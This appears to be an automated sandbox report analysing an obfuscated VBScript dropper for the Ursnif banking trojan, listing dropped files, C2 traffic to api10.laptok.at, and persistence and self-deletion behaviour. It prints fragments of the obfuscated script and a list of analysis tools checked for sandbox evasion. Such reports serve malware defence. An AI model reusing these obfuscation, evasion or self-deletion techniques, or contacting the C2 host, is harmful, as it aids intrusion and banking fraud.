Analysis Report 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs

ID:	329942
Product:	CloudBasic
Start time:	17:01:56
Start date:	13.12.2020
Sample:	3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	e913defabdbffb6f3e8f5059d44cbf5f
SHA1:	6b7712ee4b899e009e9fca462168041cbedb881a
SHA256:	c3d02a137b9fffdcc4b61fba5f6653a35c4cee283ad0f0c878bc4e8a5fee6cf9

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CD3F6758-3D5C-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	5888A8B9B5F425EF6D2AA809BAC8E2EE	A1C8C14A120B384DB02906ABDDB066CE14509A72	CD3CAA0199F1C8CEEAB66FA13356E34162EB1563FF981F84B30269947A0C508D
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{CD3F675A-3D5C-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	21ECA239340CA9FB80E6693EB5FD686C	C5F6A08E0BF7AA598B0049722FB13BE924366835	1854740F427FD77B0F4983D94FFAF0F55C89C5E2BB6FD1480988E6F6E82FB6AC
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	F0DB436FE33147C04AC206A00791DBDC	0EFF840C09E9342F9EEAD429264224FB9D725379	FE3925F181822FCE08F034074DFCFA77E7895EAAE32168436F5A79978C3821B2
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	2748B577A854525FFD0DBB35941C0E64	4C78F967AE2E480DB010E2340FD1F1FD49E07AF1	C2EF6B1206BEAEEE4E428A7BFC90FD822B4F09373BD730786E1D680786CD17D3
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	A6E679AD61579C35E56F45FB7B9F91C2	67E782CC326CF5CE0E1C62D1C605389F2F12802B	7A6F67D60691DE25A7D765D1F39757C5B556B0509F93AF81F76E3A482F849B04
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	FDCC26462F488080DE1CFBB381682F5D	B20DED6D4FAFC1558345B82191D9EEC32FA24AE7	973C4AB5F935D8AD3386B40CC215C5845A841B88048B2AF1E5B2A0AF9370B809
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	E664F3E1BF4F2C88459F9A1A27FB4EE9	CEFB5CCB044608327E412B7727B3D9177CC77202	50ED08B86EE6040A5622E22421D83863023D6323896F4B93DF8EA7E846AD5E9B
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	F1032DC2B681AF388650CB20B5155CE0	AF383C649119AD6ADF0AEA28706E46438CD235CB	031297A44AAFF79651CC6CED17949BD35876F7097670EF976CC26E12BEBE12EF
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	82EC040D148FC40A78DEB2F3D97ED8C3	40B4D14D02FD26418B6A074DA7899A8176240332	90C640A2EE15D6401BD33CA6B6CA8D9C10FDEAD8296BF64324CAC1ABDCDC3C40
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	FF9F6516CC9F09A4A2F1ABAA71A2F42C	5C01BC825275AC95E07B8CBE3BAFB3772BE097A7	EBADA3FDBB8BF3A6F171F0154310E1E9318EB87EA610030F1F90CF149A8C4FD2
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	B5D7E63407ABB8772B98A11C2411485C	B806C2A1772169DCDB01A564C00FEE5F1FCC832D	BFD166028AEA22949B44AD06898E55476B0B96A37D5E35713A067A8213B2B9D7
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log	ASCII text, with CRLF line terminators	117F417B7378064572D82C4DA68E1224	5A5DD6500103E5FA2D77FC463FC4879DEC0CA006	477083209752FBA210A7E66103E8991D04EAEB84DCFCBBB3F2E40455D807BBF6
C:\Users\user\AppData\Local\Temp\adobe.url	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators	99D9EE4F5137B94435D9BF49726E3D7B	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
C:\Users\user\AppData\Local\Temp\bassinet.jar	ASCII text, with no line terminators	D5EE3B81704FD1BC056778387EA07DF7	D26F9EE5D689147ADCB2A76030B4B67E00D21F14	D7332D6E08B6AD55B001CC057A8D78B9C71279A531B0F3A057B1A3A3E6AFB465
C:\Users\user\AppData\Local\Temp\bucket.zip	Zip archive data, at least v2.0 to extract	2184D3D8FD84E4D3C7384B40A99533C2	53455511227D40A51A4097766271207400CEE1BB	12B0C39A2A0ECDA97B9C6FFA34900F3E486F919371FA8E645245A630EE75AE4D
C:\Users\user\AppData\Local\Temp\differ.m3u	ASCII text, with no line terminators	7C914436B1F52B7136C4D26C55537EBE	7EDA52C737E99942F67C650B858FFA36C1AFDEE1	3EA1F6EADD11095DA973C70A3EC6DA24E6EC009CDA2981E7C98BC9A1690F0F28
C:\Users\user\AppData\Local\Temp\limpid.ai	ASCII text, with no line terminators	7EA1465DF570A6AFFF58674BC73EF492	639CADE22ABA285001A8A2E675AEBCA1260085C3	08282399D9ED626722A5996EE26D7F737BFCACA1662007821BCFDEECD5F308D1
C:\Users\user\AppData\Local\Temp\motel.cpio	ASCII text, with no line terminators	02900BBE597C0769692793BE25A77E1C	7C5362ECD7D0F80077654A60C74ECB9404E1CDB3	BD0C095CE64316A5458791A75CCA27F76665A73A6875F8CA9CE95C6D84224EA7
C:\Users\user\AppData\Local\Temp\occurrent.xlsx	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	97F94973600A1621A88F29704CCD221B	0919BA792FD99F6D38807616125EEB2DC7B91F5B	2804E1927303F37313996430C3F824DB6F0A471793CCAE5D5E29216C60BDA682
C:\Users\user\AppData\Local\Temp\silkworm.ra	ASCII text, with no line terminators	E528B474D6EC6CCED332670A9AB873BD	A3D0F1443572A31342E30710DE380CAE24BF6F01	3C02BA173EF48D0CFC042AC203DDE31C7B605EBAD2E23F4C6ABDFA8AEA4891B7
C:\Users\user\AppData\Local\Temp\~DF6F285664D9B9AF7F.TMP	data	3F75105ECB30856943E5CCF419315319	16C0E13322E7C8A4F6A1084543F89660E4A3D25D	E9EB9316436B9D6F5B78E710E0C13D4CE789A1D5EC9F57B609980FDE58115A15
C:\Users\user\AppData\Local\Temp\~DFCA0E3485CC728AC2.TMP	data	5D0895F14161F0C0D6C3102125EC0D8B	BE882E37CFC107AAB05CE8BFA2A5590B5E5B8273	08BBDF3C0AC44026C8BA103BEC54885E8D4C85ED1F847A5DDA8A55AA9F9FC4DB

AV Detection:

Multi AV Scanner detection for domain / URL

Source: api10.laptok.at	Virustotal: Detection: 12%			Perma Link
Source: http://api10.laptok.at/favicon.ico	Virustotal: Detection: 12%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\occurrent.xlsx	Virustotal: Detection: 36%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\occurrent.xlsx	Metadefender: Detection: 16%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\occurrent.xlsx	ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs	Virustotal: Detection: 20%			Perma Link
Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs	ReversingLabs: Detection: 22%

Spreading:

Enumerates the file system

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local			Jump to behavior

Networking:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 47.241.19.44 47.241.19.44

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /api1/tcaxpvd4aE8wKgoJlfYM2r/mfaTHqejrF6Ms/fbc5TC6Y/Ifyg72FAqKAjYDX6bHayr47/eRQRrltwQ5/64lRZGzla3M_2B0WA/kxTVS_2Fr7nt/rK_2BABkAtX/yDDo6_2B3pEN9H/NYwyDmo_2FYcvMVgPGpXD/Exdt_2FIBawltH_2/Fy0azIOxL7Yasif/vnkFJ0vm4N7tHBKMPY/K42llqWvr/aTpOJPo87yeEq9IUL2sh/sTONsr4H4kkXgR8pHPc/bMTnM0tyiyC_2FFNJsEa_0/A_0DFjfJrb9DF/SHbL_2BH/ZaYX_2BNdJdcrZzOwiVlaeh/daUI_2B_2BvtnK/3 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive

Found strings which match to known social media urls

Source: msapplication.xml0.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa32ff212,0x01d6d169</date><accdate>0xa32ff212,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa32ff212,0x01d6d169</date><accdate>0xa32ff212,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa3325271,0x01d6d169</date><accdate>0xa3325271,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa3325271,0x01d6d169</date><accdate>0xa3325271,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa334b4ac,0x01d6d169</date><accdate>0xa334b4ac,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa334b4ac,0x01d6d169</date><accdate>0xa334b4ac,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 13 Dec 2020 16:03:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Urls found in memory or binary data

Source: {CD3F675A-3D5C-11EB-90EB-ECF4BBEA1588}.dat.15.dr	String found in binary or memory: http://api10.laptok.at/api1/tcaxpvd4aE8wKgoJlfYM2r/mfaTHqejrF6Ms/fbc5TC6Y/Ifyg72FAqKAjYDX6bHayr47/eR
Source: msapplication.xml.15.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.15.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.15.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.15.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.15.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.15.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.15.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.15.dr	String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\occurrent.xlsx 2804E1927303F37313996430C3F824DB6F0A471793CCAE5D5E29216C60BDA682

Java / VBScript file with very long strings (likely obfuscated code)

Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs

Initial sample: Strings found which are bigger than 50

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: occurrent.xlsx.0.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Classification label

Source: classification engine

Classification label: mal100.troj.evad.winVBS@4/22@1/1

Creates files inside the user directory

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CD3F6758-3D5C-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Creates temporary files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\adobe.url

Jump to behavior

Executes visual basic scripts

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs'

Queries process information (via WMI, Win32_Process)

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Reads ini files

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample is known by Antivirus

Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs	Virustotal: Detection: 20%
Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs	ReversingLabs: Detection: 22%

Spawns processes

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5900 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5900 CREDAT:17410 /prefetch:2			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Submission file is bigger than most known malware samples

Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs

Static file information: File size 2513120 > 1048576

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Binary contains paths to debug symbols

Source:

Binary string: c:\Letterplease\CompareBlack\PlanKey\coast.pdb source: wscript.exe, 00000000.00000003.695178890.000002367448D000.00000004.00000001.sdmp, occurrent.xlsx.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.QuitEnd IfIf (must447 = 5000000) ThennrIOBNG = nrIOBNG + (104 - ((1234 - (4335 - 3205.0)) - 100.0))End IfREM sadism shah461 Dortmund altar spheric inapproachable protractor allotted chill617 craftsmen bacchanalian, Linotype Parthia crimp Riemannian actinic Aaron510 Abelson palisade hydrothermal croupier morbid latitude Seidel betide iodine connotation explode headwind negate wise cambric perpetuate Azerbaijan. smallpox Meistersinger contractor. coffee bemuse Lagos monetarism wishful scattergun narcotic lid pinhole brownish pica PTA, 3566063 bobble acerbic, affectionate interferometer polytechnic cosmopolitan ascension, tribe prostaglandin310 necessitate Bootes tremble88 Vida occidental drippy Cuba, orient wand tableaux flagellate. 5841248 rapier irretrievable Notre261 varistor posterior accusative platonic Sanhedrin, Eros form pluck macrophage thy Mansfield PVC Belize Spain monsieur knack Jorgenson leap31 owe too shabby delusive imbalance impassive improbable If (must447 = 200) ThenExit DoEnd ifmust447 = must447 + 1LoopWith WScript.Sleep 5000End With' whorl bluff penitent Cyrillic wastage atheist Grenoble unchristian famish Barrett Tasmania889 Chicano psychosis teat896 tort Brooklyn auspice, Ackerman Prado Daytona insignia myel Norfolk. martini leisure incautious lock calligraphy Sol whiz left907 empire Anna Pasadena contribution dryad posey. declamatory froze mock701, 3443966 assign Burke guardian prehensile JACM shrike mi Kauffman teat470 gnat maser pompey mammal mulct cant Vassar Yaounde staph cachalot929 Eleazar Sikorsky serene swam prurient Stamford Formosa retention chartreuse befallen spalding. vouch decipher ancient. click demoniac Cochran girlish desolater strategist, Brandt fricative cacao exhilarate rapprochement Chinook Pitt978 Aquinas End FunctionFunction VTuCrj()' sensual, 1938734 demented cork politicking tropic hay marigold malnourished scarves Simpson ppm cuttlefish707 sum73 megaton fiance Astoria course, 8993080 circumvention869 without sugary paraphernalia Luftwaffe91 carton excessive jumpy leadeth237 millionaire instruct, 1390117 copywriter gel145 wallow. 1785352 glen901 acclaim bestir radiophysics swampland486 Cecil remediable cop restive ashen everybody mercuric Thetis124 sorghum rob doctoral chef wisecrack turnabout Galatea sinistral Mendelian magnanimous courage primitive test Friedman kibitz heavy Virginia lumen botanic flute inputting grandfather. stater Dim confiscatory: Set confiscatory = WScript.CreateObject("Scripting.FileSystemObject")confiscatory.DeleteFile WScript.ScriptFullName, TrueEnd FunctionFunction Doria(transonic, lunge)Dim TPeZLgi, Worcestershire43Set TPeZLgi = CreateObject("Scripting.FileSystemObject")REM bismuth methyl. melon Barney dharma. standoff impious slide pee919, testicle vale fishpond. referent backpedal TWA cotangent centenary heel corrodible343 Saviour, wingtip925 viewpoint114 boolean483 hereinabove. 3232348 checksummed, pass sentential accretion colonist Cartesian. 5287369 ea

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\occurrent.xlsx

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\occurrent.xlsx

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY

Deletes itself after installation

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXEA
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.695861434.000002366C2E4000.00000004.00000001.sdmp	Binary or memory string: XE","WINALYSIS.EXE","EMUL.EXE","MALMON.EXE","REPUTILS32.EXE","WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXER
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXEZ:V
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXET
